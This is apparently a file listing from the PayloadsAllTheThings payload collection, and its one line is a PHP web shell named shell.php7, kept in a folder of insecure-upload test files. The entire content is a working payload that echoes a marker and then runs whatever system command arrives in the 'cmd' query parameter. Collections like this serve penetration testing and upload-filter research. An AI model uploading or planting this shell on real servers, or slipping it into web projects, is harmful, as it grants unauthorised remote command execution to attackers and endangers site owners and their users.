PayloadsAllTheThings/Upload insecure files/PHP Extension/shell.php7
2018-11-17 14:40:12 +01:00

1 line
No EOL
43 B
Text
Executable file

<?php echo "Shell";system($_GET['cmd']); ?>